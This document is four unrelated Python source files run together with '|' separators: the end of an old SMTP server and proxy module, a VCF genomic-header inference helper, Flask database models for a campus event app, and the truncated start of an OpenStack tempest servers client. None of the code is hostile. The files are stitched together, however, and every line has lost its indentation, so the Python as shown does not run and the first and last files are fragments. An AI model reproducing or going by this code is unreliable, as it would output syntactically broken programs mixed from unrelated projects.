self.set_terminator('\r\n')
if not status:
self.push('250 Ok')
else:
self.push(status)
# SMTP and ESMTP commands
def smtp_HELO(self, arg):
if not arg:
self.push('501 Syntax: HELO hostname')
return
if self.__greeting:
self.push('503 Duplicate HELO/EHLO')
else:
self.__greeting = arg
self.push('250 %s' % self.__fqdn)
def smtp_NOOP(self, arg):
if arg:
self.push('501 Syntax: NOOP')
else:
self.push('250 Ok')
def smtp_QUIT(self, arg):
# args is ignored
self.push('221 Bye')
self.close_when_done()
# factored
def __getaddr(self, keyword, arg):
address = None
keylen = len(keyword)
if arg[:keylen].upper() == keyword:
address = arg[keylen:].strip()
if not address:
pass
elif address[0] == '<' and address[-1] == '>' and address != '<>':
# Addresses can be in the form <[email protected]> but watch out
# for null address, e.g. <>
address = address[1:-1]
return address
def smtp_MAIL(self, arg):
print >> DEBUGSTREAM, '===> MAIL', arg
address = self.__getaddr('FROM:', arg) if arg else None
if not address:
self.push('501 Syntax: MAIL FROM:<address>')
return
if self.__mailfrom:
self.push('503 Error: nested MAIL command')
return
self.__mailfrom = address
print >> DEBUGSTREAM, 'sender:', self.__mailfrom
self.push('250 Ok')
def smtp_RCPT(self, arg):
print >> DEBUGSTREAM, '===> RCPT', arg
if not self.__mailfrom:
self.push('503 Error: need MAIL command')
return
address = self.__getaddr('TO:', arg) if arg else None
if not address:
self.push('501 Syntax: RCPT TO: <address>')
return
self.__rcpttos.append(address)
print >> DEBUGSTREAM, 'recips:', self.__rcpttos
self.push('250 Ok')
def smtp_RSET(self, arg):
if arg:
self.push('501 Syntax: RSET')
return
# Resets the sender, recipients, and data, but not the greeting
self.__mailfrom = None
self.__rcpttos = []
self.__data = ''
self.__state = self.COMMAND
self.push('250 Ok')
def smtp_DATA(self, arg):
if not self.__rcpttos:
self.push('503 Error: need RCPT command')
return
if arg:
self.push('501 Syntax: DATA')
return
self.__state = self.DATA
self.set_terminator('\r\n.\r\n')
self.push('354 End data with <CR><LF>.<CR><LF>')
class SMTPServer(asyncore.dispatcher):
def __init__(self, localaddr, remoteaddr):
self._localaddr = localaddr
self._remoteaddr = remoteaddr
asyncore.dispatcher.__init__(self)
try:
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
# try to re-use a server port if possible
self.set_reuse_addr()
self.bind(localaddr)
self.listen(5)
except:
# cleanup asyncore.socket_map before raising
self.close()
raise
else:
print >> DEBUGSTREAM, \
'%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
self.__class__.__name__, time.ctime(time.time()),
localaddr, remoteaddr)
def handle_accept(self):
pair = self.accept()
if pair is not None:
conn, addr = pair
print >> DEBUGSTREAM, 'Incoming connection from %s' % repr(addr)
channel = SMTPChannel(self, conn, addr)
# API for "doing something useful with the message"
def process_message(self, peer, mailfrom, rcpttos, data):
"""Override this abstract method to handle messages from the client.
peer is a tuple containing (ipaddr, port) of the client that made the
socket connection to our smtp port.
mailfrom is the raw address the client claims the message is coming
from.
rcpttos is a list of raw addresses the client wishes to deliver the
message to.
data is a string containing the entire full text of the message,
headers (if supplied) and all. It has been `de-transparencied'
according to RFC 821, Section 4.5.2. In other words, a line
containing a `.' followed by other text has had the leading dot
removed.
This function should return None, for a normal `250 Ok' response;
otherwise it returns the desired response string in RFC 821 format.
"""
raise NotImplementedError
class DebuggingServer(SMTPServer):
# Do something with the gathered message
def process_message(self, peer, mailfrom, rcpttos, data):
inheaders = 1
lines = data.split('\n')
print '---------- MESSAGE FOLLOWS ----------'
for line in lines:
# headers first
if inheaders and not line:
print 'X-Peer:', peer[0]
inheaders = 0
print line
print '------------ END MESSAGE ------------'
class PureProxy(SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
lines = data.split('\n')
# Look for the last header
i = 0
for line in lines:
if not line:
break
i += 1
lines.insert(i, 'X-Peer: %s' % peer[0])
data = NEWLINE.join(lines)
refused = self._deliver(mailfrom, rcpttos, data)
# TBD: what to do with refused addresses?
print >> DEBUGSTREAM, 'we got some refusals:', refused
def _deliver(self, mailfrom, rcpttos, data):
import smtplib
refused = {}
try:
s = smtplib.SMTP()
s.connect(self._remoteaddr[0], self._remoteaddr[1])
try:
refused = s.sendmail(mailfrom, rcpttos, data)
finally:
s.quit()
except smtplib.SMTPRecipientsRefused, e:
print >> DEBUGSTREAM, 'got SMTPRecipientsRefused'
refused = e.recipients
except (socket.error, smtplib.SMTPException), e:
print >> DEBUGSTREAM, 'got', e.__class__
# All recipients were refused. If the exception had an associated
# error code, use it. Otherwise,fake it with a non-triggering
# exception code.
errcode = getattr(e, 'smtp_code', -1)
errmsg = getattr(e, 'smtp_error', 'ignore')
for r in rcpttos:
refused[r] = (errcode, errmsg)
return refused
class MailmanProxy(PureProxy):
def process_message(self, peer, mailfrom, rcpttos, data):
from cStringIO import StringIO
from Mailman import Utils
from Mailman import Message
from Mailman import MailList
# If the message is to a Mailman mailing list, then we'll invoke the
# Mailman script directly, without going through the real smtpd.
# Otherwise we'll forward it to the local proxy for disposition.
listnames = []
for rcpt in rcpttos:
local = rcpt.lower().split('@')[0]
# We allow the following variations on the theme
# listname
# listname-admin
# listname-owner
# listname-request
# listname-join
# listname-leave
parts = local.split('-')
if len(parts) > 2:
continue
listname = parts[0]
if len(parts) == 2:
command = parts[1]
else:
command = ''
if not Utils.list_exists(listname) or command not in (
'', 'admin', 'owner', 'request', 'join', 'leave'):
continue
listnames.append((rcpt, listname, command))
# Remove all list recipients from rcpttos and forward what we're not
# going to take care of ourselves. Linear removal should be fine
# since we don't expect a large number of recipients.
for rcpt, listname, command in listnames:
rcpttos.remove(rcpt)
# If there's any non-list destined recipients left,
print >> DEBUGSTREAM, 'forwarding recips:', ' '.join(rcpttos)
if rcpttos:
refused = self._deliver(mailfrom, rcpttos, data)
# TBD: what to do with refused addresses?
print >> DEBUGSTREAM, 'we got refusals:', refused
# Now deliver directly to the list commands
mlists = {}
s = StringIO(data)
msg = Message.Message(s)
# These headers are required for the proper execution of Mailman. All
# MTAs in existence seem to add these if the original message doesn't
# have them.
if not msg.getheader('from'):
msg['From'] = mailfrom
if not msg.getheader('date'):
msg['Date'] = time.ctime(time.time())
for rcpt, listname, command in listnames:
print >> DEBUGSTREAM, 'sending message to', rcpt
mlist = mlists.get(listname)
if not mlist:
mlist = MailList.MailList(listname, lock=0)
mlists[listname] = mlist
# dispatch on the type of command
if command == '':
# post
msg.Enqueue(mlist, tolist=1)
elif command == 'admin':
msg.Enqueue(mlist, toadmin=1)
elif command == 'owner':
msg.Enqueue(mlist, toowner=1)
elif command == 'request':
msg.Enqueue(mlist, torequest=1)
elif command in ('join', 'leave'):
# TBD: this is a hack!
if command == 'join':
msg['Subject'] = 'subscribe'
else:
msg['Subject'] = 'unsubscribe'
msg.Enqueue(mlist, torequest=1)
class Options:
setuid = 1
classname = 'PureProxy'
def parseargs():
global DEBUGSTREAM
try:
opts, args = getopt.getopt(
sys.argv[1:], 'nVhc:d',
['class=', 'nosetuid', 'version', 'help', 'debug'])
except getopt.error, e:
usage(1, e)
options = Options()
for opt, arg in opts:
if opt in ('-h', '--help'):
usage(0)
elif opt in ('-V', '--version'):
print >> sys.stderr, __version__
sys.exit(0)
elif opt in ('-n', '--nosetuid'):
options.setuid = 0
elif opt in ('-c', '--class'):
options.classname = arg
elif opt in ('-d', '--debug'):
DEBUGSTREAM = sys.stderr
# parse the rest of the arguments
if len(args) < 1:
localspec = 'localhost:8025'
remotespec = 'localhost:25'
elif len(args) < 2:
localspec = args[0]
remotespec = 'localhost:25'
elif len(args) < 3:
localspec = args[0]
remotespec = args[1]
else:
usage(1, 'Invalid arguments: %s' % COMMASPACE.join(args))
# split into host/port pairs
i = localspec.find(':')
if i < 0:
usage(1, 'Bad local spec: %s' % localspec)
options.localhost = localspec[:i]
try:
options.localport = int(localspec[i+1:])
except ValueError:
usage(1, 'Bad local port: %s' % localspec)
i = remotespec.find(':')
if i < 0:
usage(1, 'Bad remote spec: %s' % remotespec)
options.remotehost = remotespec[:i]
try:
options.remoteport = int(remotespec[i+1:])
except ValueError:
usage(1, 'Bad remote port: %s' % remotespec)
return options
if __name__ == '__main__':
options = parseargs()
# Become nobody
classname = options.classname
if "." in classname:
lastdot = classname.rfind(".")
mod = __import__(classname[:lastdot], globals(), locals(), [""])
classname = classname[lastdot+1:]
else:
import __main__ as mod
class_ = getattr(mod, classname)
proxy = class_((options.localhost, options.localport),
(options.remotehost, options.remoteport))
if options.setuid:
try:
import pwd
except ImportError:
print >> sys.stderr, \
'Cannot import module "pwd"; try running with -n option.'
sys.exit(1)
nobody = pwd.getpwnam('nobody')[2]
try:
os.setuid(nobody)
except OSError, e:
if e.errno != errno.EPERM: raise
print >> sys.stderr, \
'Cannot setuid "nobody"; try running with -n option.'
sys.exit(1)
try:
asyncore.loop()
except KeyboardInterrupt:
pass
|
|
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A helper module for header inference operations."""
import logging
from typing import Any, Dict, List, Optional, Union # pylint: disable=unused-import
from gcp_variant_transforms.beam_io import vcf_header_io
from gcp_variant_transforms.beam_io import vcf_parser
from gcp_variant_transforms.beam_io import vcfio # pylint: disable=unused-import
from gcp_variant_transforms.libs import vcf_field_conflict_resolver
from gcp_variant_transforms.libs.annotation import annotation_parser
_FIELD_COUNT_ALTERNATE_ALLELE = vcf_parser.FIELD_COUNT_ALTERNATE_ALLELE
# Alias for the header key/type constants to make referencing easier.
_HeaderKeyConstants = vcf_header_io.VcfParserHeaderKeyConstants
_HeaderTypeConstants = vcf_header_io.VcfHeaderFieldTypeConstants
_PysamHeaderKeyConstants = vcf_header_io.PysamHeaderKeyConstants
# Filled with annotation field and name data, then used as a header ID.
_BASE_ANNOTATION_TYPE_KEY = '{}_{}_TYPE'
def get_inferred_annotation_type_header_key(annot_field, name):
# type: (str, str) -> str
"""Creates ID values for annotation type info headers.
Args:
annot_field: field name representing annotation field (e.g. 'CSQ').
name: annotation data field names (e.g. 'IMPACT').
Returns:
Info ID value (e.g. CSQ_IMPACT_TYPE).
"""
return _BASE_ANNOTATION_TYPE_KEY.format(annot_field, name)
def infer_info_fields(
variant, # type: vcfio.Variant
defined_headers, # type: vcf_header_io.VcfHeader
infer_headers=False, # type: bool
annotation_fields_to_infer=None # type: Optional[List[str]]
):
"""Returns inferred info fields.
Up to three types of info fields are inferred:
if `infer_headers` is True:
- The info fields are undefined in the headers.
- The info fields' definitions provided by the header does not match the
field value.
if `infer_annotation_types` is True:
- Fields containing type information of corresponding annotation Info
fields.
Args:
variant: variant object
defined_headers: header fields defined in header section of VCF files.
infer_headers: If true, header fields are inferred from variant data.
annotation_fields_to_infer: list of info fields treated as annotation
fields (e.g. ['CSQ', 'CSQ_VT']).
Returns:
infos: dict of (info_key, `Info`) for any info field in
`variant` that is not defined in the header or the definition mismatches
the field values.
"""
infos = {}
if infer_headers:
_infer_non_annotation_info_fields(variant, infos, defined_headers)
if annotation_fields_to_infer:
_infer_annotation_type_info_fields(
variant, infos, defined_headers, annotation_fields_to_infer)
return infos
def infer_format_fields(
variant, # type: vcfio.Variant
defined_headers # type: vcf_header_io.VcfHeader
):
# type: (...) -> Dict[str, vcf_header_io.VcfHeaderFormatField]
"""Returns inferred format fields.
Two types of format fields are inferred:
- The format fields are undefined in the headers.
- The format definition provided by the headers does not match the field
values.
Args:
variant: variant object
defined_headers: header fields defined in header section of VCF files.
Returns:
A dict of (format_key, `Format`) for any format key in
`variant` that is not defined in the header or the definition mismatches
the field values.
"""
formats = {}
if defined_headers and defined_headers.formats:
for format_key, format_value in defined_headers.formats.items():
formats[format_key] = vcf_header_io.CreateFormatField(
format_key,
format_value[_HeaderKeyConstants.NUM],
format_value[_HeaderKeyConstants.TYPE],
format_value[_HeaderKeyConstants.DESC],
)
updated_formats = {}
for call in variant.calls:
for format_key, format_value in call.info.items():
if format_key not in formats:
logging.warning('Undefined FORMAT field "%s" in variant "%s"',
format_key, str(variant))
formats[format_key] = vcf_header_io.CreateFormatField(
format_key,
_get_field_count(format_value),
_get_field_type(format_value))
updated_formats[format_key] = formats[format_key]
else:
defined_header = formats[format_key]
corrected_format = _infer_mismatched_format_field(
format_key, format_value, defined_header)
if corrected_format:
logging.warning(
'Adjusting FORMAT field "%s". Defined as "type=%s,num=%s", '
'got "%s" in variant "%s"',
format_key, defined_header.record[_PysamHeaderKeyConstants.TYPE],
str(defined_header.record[_PysamHeaderKeyConstants.NUM]),
str(format_value), str(variant))
formats[format_key] = corrected_format
updated_formats[format_key] = formats[format_key]
return updated_formats
def _get_field_count(field_value):
# type: (Union[List, bool, int, str]) -> Optional[int]
"""
Args:
field_value: value for the field. E.g. [0.33, 0.66] is a field value for
Allele frequency (AF) field.
"""
if isinstance(field_value, list):
return '.'
elif isinstance(field_value, bool):
return 0
else:
return 1
def _get_field_type(field_value):
"""
Args:
field_value (list, bool, integer, or string): value for the field. E.g.
[0.33, 0.66] is a field value for Allele frequency (AF) field.
"""
if isinstance(field_value, list):
return (_get_field_type(field_value[0]) if field_value else
vcf_header_io.VcfHeaderFieldTypeConstants.STRING)
if isinstance(field_value, bool):
return vcf_header_io.VcfHeaderFieldTypeConstants.FLAG
elif isinstance(field_value, int):
return vcf_header_io.VcfHeaderFieldTypeConstants.INTEGER
elif isinstance(field_value, float):
return vcf_header_io.VcfHeaderFieldTypeConstants.FLOAT
elif _can_cast_to(field_value, int):
return vcf_header_io.VcfHeaderFieldTypeConstants.INTEGER
elif _can_cast_to(field_value, float):
return vcf_header_io.VcfHeaderFieldTypeConstants.FLOAT
else:
return vcf_header_io.VcfHeaderFieldTypeConstants.STRING
def _can_cast_to(value, cast_type):
"""Returns true if `value` can be casted to type `type`"""
try:
_ = cast_type(str(value))
return True
except (ValueError, TypeError):
return False
def _get_corrected_type(defined_type, value):
# type: (str, Any) -> str
"""Returns the corrected type according to `defined_type` and `value`.
For lists we recurisively find types for the underlying elements and pick a
"smallest common denominator" type.
If the expected type is integer, we make sure that the value is either int,
float that could be converted to int or string that could be converted int.
Similarly, if the expected type is float we verify that the value is either
float or a str representation of float number (note that if value is int,
preffered type will remain float).
For the expected type of Flag we verify that the value is bool.
If the field is absent, it can be of any type, so we keep the expected type.
Finally, if encountered a non-numeric str, or two types cannot be used stored
together (ie. flag and int), we return String type.
"""
if isinstance(value, list):
corrected_type = defined_type
for item in value:
corrected_type = _get_corrected_type(corrected_type, item)
return corrected_type
if value is None:
return defined_type
if defined_type == _HeaderTypeConstants.FLAG and isinstance(value, bool):
return defined_type
if defined_type == _HeaderTypeConstants.INTEGER:
if isinstance(value, int):
return defined_type
if isinstance(value, float):
if value.is_integer():
return _HeaderTypeConstants.INTEGER
return _HeaderTypeConstants.FLOAT
if isinstance(value, str):
if _can_str_be_int(value):
return defined_type
if _can_str_be_float(value):
return _HeaderTypeConstants.FLOAT
if defined_type == _HeaderTypeConstants.FLOAT and (
isinstance(value, (int, float)) or
(isinstance(value, str) and _can_str_be_float(value))):
return _HeaderTypeConstants.FLOAT
return _HeaderTypeConstants.STRING
def _can_str_be_int(value):
if value is None:
return True
try:
_ = int(value)
return True
except ValueError:
return False
def _can_str_be_float(value):
if value is None:
return True
try:
_ = float(value)
return True
except ValueError:
return False
def _infer_mismatched_info_field(field_key, # type: str
field_value, # type: Any
defined_header, # type: Dict
num_alternate_bases # type: int
):
# type: (...) -> Optional[vcf_header_io.VcfHeaderInfoField]
"""Returns corrected info if there are mismatches.
Two mismatches are handled:
- Defined num is `A`, but the provided values do not have the same
cardinality as the alternate bases. Correct the num to be `.`.
- Defined type is `Integer`, but the provided value is float. Correct the
type to be `Float`.
Args:
field_key: the info field key.
field_value: the value of the field key given in the variant.
defined_header: The definition of `field_key` in the header.
num_alternate_bases: number of the alternate bases.
Returns:
Corrected info definition if there are mismatches.
"""
corrected_num = defined_header.get(_HeaderKeyConstants.NUM)
if (corrected_num == _FIELD_COUNT_ALTERNATE_ALLELE and
len(field_value) != num_alternate_bases):
corrected_num = '.'
corrected_type = _get_corrected_type(
defined_header.get(_HeaderKeyConstants.TYPE), field_value)
if (corrected_type != defined_header.get(_HeaderKeyConstants.TYPE) or
corrected_num != defined_header.get(_HeaderKeyConstants.NUM)):
return vcf_header_io.CreateInfoField(
field_key,
corrected_num,
corrected_type,
defined_header.get(_HeaderKeyConstants.DESC),
defined_header.get(_HeaderKeyConstants.SOURCE),
defined_header.get(_HeaderKeyConstants.VERSION))
return None
def _infer_mismatched_format_field(field_key, field_value, defined_header):
# type: (str, Any, Dict) -> Optional[vcf_header_io.VcfHeaderFormatField]
"""Returns corrected format if there are mismatches.
One type of mismatches is handled:
- Defined type is `Integer`, but the provided value is float. Correct the
type to be `Float`.
Args:
field_key: the format field key.
field_value: the value of the field key given in the variant.
defined_header: The definition of `field_key` in the header.
Returns:
Corrected format definition if there are mismatches.
"""
corrected_type = _get_corrected_type(
defined_header.record[_PysamHeaderKeyConstants.TYPE], field_value)
if corrected_type != defined_header.record[_PysamHeaderKeyConstants.TYPE]:
return vcf_header_io.CreateFormatField(
field_key,
defined_header.record[_PysamHeaderKeyConstants.NUM],
corrected_type,
defined_header.record[_PysamHeaderKeyConstants.DESC])
return None
def _infer_non_annotation_info_fields(
variant, # type: vcfio.Variant
infos, # type: Dict[str, vcf_header_io.VcfHeaderInfoField]
defined_headers # type: vcf_header_io.VcfHeader
):
# type: (...) -> None
"""Updates `infos` with inferred info fields.
Two types of info fields are inferred:
- The info fields are undefined in the headers.
- The info fields' definitions provided by the header does not match the
field value.
Args:
variant: variant object
infos: dict of (info_key, `Info`) for any info field in
`variant` that is not defined in the header or the definition mismatches
the field values.
defined_headers: header fields defined in header section of VCF files.
"""
for info_field_key, info_field_value in variant.info.items():
if not defined_headers or info_field_key not in defined_headers.infos:
if info_field_key in infos:
raise ValueError(
'Duplicate INFO field "{}" in variant "{}"'.format(
info_field_key, variant))
logging.warning('Undefined INFO field "%s" in variant "%s"',
info_field_key, str(variant))
infos[info_field_key] = vcf_header_io.CreateInfoField(
info_field_key,
_get_field_count(info_field_value),
_get_field_type(info_field_value))
else:
defined_header = defined_headers.infos.get(info_field_key)
corrected_info = _infer_mismatched_info_field(
info_field_key, info_field_value,
defined_header, len(variant.alternate_bases))
if corrected_info:
logging.warning(
'Incorrect INFO field "%s". Defined as "type=%s,num=%s", '
'got "%s", in variant "%s"',
info_field_key, defined_header.get(_HeaderKeyConstants.TYPE),
str(defined_header.get(_HeaderKeyConstants.NUM)),
str(info_field_value), str(variant))
infos[info_field_key] = corrected_info
def _infer_annotation_type_info_fields(
variant, # type: vcfio.Variant
infos, # type: Dict[str, vcf_header_io.VcfHeaderInfoField]
defined_headers, # type: vcf_header_io.VcfHeader
annotation_fields_to_infer # type: List[str]
):
# type: (...) -> None
"""Updates `infos` with inferred annotation type info fields.
All annotation headers in each annotation field are converted to Info header
lines where the new ID corresponds to the given annotation field and header,
and the new TYPE corresponds to inferred type of the original header. Since
each variant potentially contains multiple values for each annotation
header, a small 'merge' of value types is performed before VcfHeader
creation for each variant.
Args:
variant: variant object
infos: dict of (info_key, `Info`) for any info field in
`variant` that is not defined in the header or the definition mismatches
the field values.
defined_headers: header fields defined in header section of VCF files.
annotation_fields_to_infer: list of info fields treated as annotation
fields (e.g. ['CSQ', 'CSQ_VT']).
"""
def _check_annotation_lists_lengths(names, values):
lengths = set(len(v) for v in values)
lengths.add(len(names))
if len(lengths) != 1:
error = ('Annotation lists have inconsistent lengths: {}.\nnames={}\n'
'values={}').format(lengths, names, values)
raise ValueError(error)
resolver = vcf_field_conflict_resolver.FieldConflictResolver(
resolve_always=True)
for field in annotation_fields_to_infer:
if field not in variant.info:
continue
annotation_names = annotation_parser.extract_annotation_names(
defined_headers.infos[field][_HeaderKeyConstants.DESC])
# First element (ALT) is ignored, since its type is hard-coded as string
annotation_values = [annotation_parser.extract_annotation_list_with_alt(
annotation)[1:] for annotation in variant.info[field]]
_check_annotation_lists_lengths(annotation_names, annotation_values)
annotation_values = list(zip(*annotation_values))
for name, values in zip(annotation_names, annotation_values):
variant_merged_type = '.'
for v in values:
if not v:
continue
variant_merged_type = resolver.resolve_attribute_conflict(
_HeaderKeyConstants.TYPE,
variant_merged_type,
_get_field_type(v))
if variant_merged_type == _HeaderTypeConstants.STRING:
break
key_id = get_inferred_annotation_type_header_key(
field, name)
infos[key_id] = vcf_header_io.CreateInfoField(
key_id,
1, # field count
variant_merged_type,
('Inferred type field for annotation {}.'.format(name)))
|
|
from datetime import datetime, timedelta, time
from dateutil import tz
import hashlib
from werkzeug.security import generate_password_hash, check_password_hash
from flask import current_app, request, url_for
from flask.ext.login import UserMixin, AnonymousUserMixin
from .extensions import db, login_manager
#from .tasks import event_notify
class Permission:
ADMINISTER = 0x80
class Role(db.Model):
__tablename__ = 'role'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref='role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'Administrator': (0xff, False)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
return self.name
attendees = db.Table('attendees',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('event_id', db.Integer, db.ForeignKey('event.id'))
)
class User(UserMixin, db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(64), unique=True, index=True)
username = db.Column(db.String(64), unique=True, index=True)
phone = db.Column(db.Integer, unique=True)
email_notifications = db.Column(db.Boolean)
password_hash = db.Column(db.String(128))
confirmed = db.Column(db.Boolean, default=False)
member_since = db.Column(db.DateTime(), default=datetime.utcnow())
location_id = db.Column(db.Integer, db.ForeignKey('location.id'))
submitted = db.relationship('Event', backref='author', lazy='dynamic')
role_id = db.Column(db.Integer, db.ForeignKey('role.id'))
def __init__(self, **kwargs):
# Auto confirm for now
self.confirmed = True
def is_attending(self, eventId):
e = Event.query.get(eventId)
if self in e.attendees:
return True
else:
return False
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
@staticmethod
def generate_fake(count=10, loc=None):
from sqlalchemy.exc import IntegrityError
from random import seed
import random
import forgery_py
seed()
for i in range(count):
u = User()
u.email=forgery_py.internet.email_address()
u.username=forgery_py.internet.user_name(True)
u.password=forgery_py.lorem_ipsum.word()
u.confirmed=True
if loc == None:
u.location_id=Location.query.get(random.randrange(1, Location.query.count())).id
else:
u.location_id=loc
u.member_since=forgery_py.date.date(True)
db.session.add(u)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def can(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
def __repr__(self):
return self.username
def __hash__(self):
return id(self)
# Flask-Login integration
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
@staticmethod
def make_admin(email):
user = User.query.filter_by(email=email).first()
user.role_id = Role.query.filter_by(name="Administrator").first().id
db.session.commit()
def num_submitted(self):
return self.submitted.count()
def to_json(self):
json_post = {
'id' : self.id,
'email' : self.email,
'member_since' : self.member_since,
'location_id' : self.location_id
}
return json_post
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class Event(db.Model):
__tablename__ = 'event'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128), index=True)
serving = db.Column(db.String(128))
place = db.Column(db.String(128))
time = db.Column(db.DateTime, index=True)
body = db.Column(db.Text)
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow())
# Store the ids of the location of the event and the user who submitted id
location_id = db.Column(db.Integer, db.ForeignKey('location.id'))
author_id = db.Column(db.Integer, db.ForeignKey('user.id'))
attendees = db.relationship('User', secondary=attendees, backref=db.backref('events', lazy='dynamic'))
def __hash__(self):
return id(self)
def generate_fake(count=100,loc=None):
from sqlalchemy.exc import IntegrityError
from random import seed
import random
import forgery_py
rand_name = ["Party!", "Study Session", "Gosnell Open House", "Student Gov Event"]
rand_locs = ["GOS 3365", "CAR 1250", "BRN 352", "ORN 107", "GOL 3200", "EAS 1243", "Library Lobby", "Infinity Quad", "Field House"]
rand_serv = ["Pizza", "Pizza", "Pizza and snacks", "Snacks", "BBQ", "Hamburgers and Hotdogs"]
seed()
for i in range(count):
e = Event()
#e.name=forgery_py.lorem_ipsum.word()
#e.serving=forgery_py.lorem_ipsum.word()
#e.place=forgery_py.lorem_ipsum.word()
e.name = rand_name[random.randint(0,len(rand_name)-1)]
e.serving = rand_serv[random.randint(0,len(rand_serv)-1)]
e.place = rand_locs[random.randint(0,len(rand_locs)-1)]
e.time= datetime.combine(forgery_py.date.date(past=False), time(hour=random.randrange(0,23),minute=random.randrange(0,59)))
e.body=forgery_py.lorem_ipsum.sentence()
e.author_id=User.query.get(random.randrange(1, User.query.count())).id
if loc == None:
e.location_id=Location.query.get(random.randrange(1, Location.query.count())).id
else:
e.location_id=loc
db.session.add(e)
if not i % 100:
print(i)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
def future_events(location_id):
""" Returns all future events """
# Autodetects timezone and lists events in the future
from_zone = tz.tzutc()
to_zone = tz.tzlocal()
utc = datetime.utcnow()
utc = utc.replace(tzinfo=from_zone)
actual = utc.astimezone(to_zone)
all_events = Event.query.filter_by(location_id=location_id)
return all_events.filter(Event.time>actual).all()
def __repr__(self):
return self.name
def attend_event(self, user_id):
""" Adds a user to an event's attendees """
u = User.query.get(user_id)
self.attendees.append(u)
# Create a notification event
# TODO: check if user wants notifications
# Have to make local to utc
to_zone = tz.tzutc()
from_zone = tz.tzlocal()
utc = self.time
utc = utc.replace(tzinfo=from_zone)
alarm = utc.astimezone(to_zone)
# Notify 30 min before event
alarm = alarm - timedelta(minutes=30)
#event_notify.apply_async( (u.username, alarm), eta=alarm )
db.session.add(self)
db.session.commit()
def unattend_event(self, user_id):
""" Removes a user from an event's attendees """
self.attendees.remove(User.query.get(user_id))
db.session.commit()
def num_attendees(self):
""" Returns the number of attendees going to an event """
num = len(self.attendees)
return num
def to_json(self):
json_post = {
'id' : self.id,
'author_id' : self.author_id,
'location_id' : self.location_id,
'name' : self.name,
'place' : self.place,
'serving' : self.serving,
'time' : self.time,
'timestamp' : self.timestamp,
'body' : self.body
}
return json_post
def __hash__(self):
return id(self)
class Location(db.Model):
__tablename__ = 'location'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128), index=True)
url = db.Column(db.String(128))
# Store the users and events that belong to this location
users = db.relationship('User', backref='location', lazy='dynamic')
events = db.relationship('Event', backref='location', lazy='dynamic')
def __repr__(self):
return self.name
def to_json(self):
json_post = {
'id' : self.id,
'name' : self.name
}
return json_post
def num_events(self):
return self.events.count()
def num_users(self):
return self.users.count()
def __hash__(self):
return id(self)
class AnonymousUser(AnonymousUserMixin):
def can(self, permissions):
return False
def is_administrator(self):
return False
def is_authenticated(self):
return False
login_manager.anonymous_user = AnonymousUser
|
|
# Copyright 2012 OpenStack Foundation
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# Copyright 2017 AT&T Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from oslo_serialization import jsonutils as json
from six.moves.urllib import parse as urllib
from tempest.lib.api_schema.response.compute.v2_1 import \
security_groups as security_groups_schema
from tempest.lib.api_schema.response.compute.v2_1 import servers as schema
from tempest.lib.api_schema.response.compute.v2_16 import servers as schemav216
from tempest.lib.api_schema.response.compute.v2_19 import servers as schemav219
from tempest.lib.api_schema.response.compute.v2_26 import servers as schemav226
from tempest.lib.api_schema.response.compute.v2_3 import servers as schemav23
from tempest.lib.api_schema.response.compute.v2_47 import servers as schemav247
from tempest.lib.api_schema.response.compute.v2_48 import servers as schemav248
from tempest.lib.api_schema.response.compute.v2_54 import servers as schemav254
from tempest.lib.api_schema.response.compute.v2_57 import servers as schemav257
from tempest.lib.api_schema.response.compute.v2_6 import servers as schemav26
from tempest.lib.api_schema.response.compute.v2_63 import servers as schemav263
from tempest.lib.api_schema.response.compute.v2_70 import servers as schemav270
from tempest.lib.api_schema.response.compute.v2_71 import servers as schemav271
from tempest.lib.api_schema.response.compute.v2_73 import servers as schemav273
from tempest.lib.api_schema.response.compute.v2_8 import servers as schemav28
from tempest.lib.api_schema.response.compute.v2_9 import servers as schemav29
from tempest.lib.common import rest_client
from tempest.lib.services.compute import base_compute_client
class ServersClient(base_compute_client.BaseComputeClient):
"""Service client for the resource /servers"""
schema_versions_info = [
{'min': None, 'max': '2.2', 'schema': schema},
{'min': '2.3', 'max': '2.5', 'schema': schemav23},
{'min': '2.6', 'max': '2.7', 'schema': schemav26},
{'min': '2.8', 'max': '2.8', 'schema': schemav28},
{'min': '2.9', 'max': '2.15', 'schema': schemav29},
{'min': '2.16', 'max': '2.18', 'schema': schemav216},
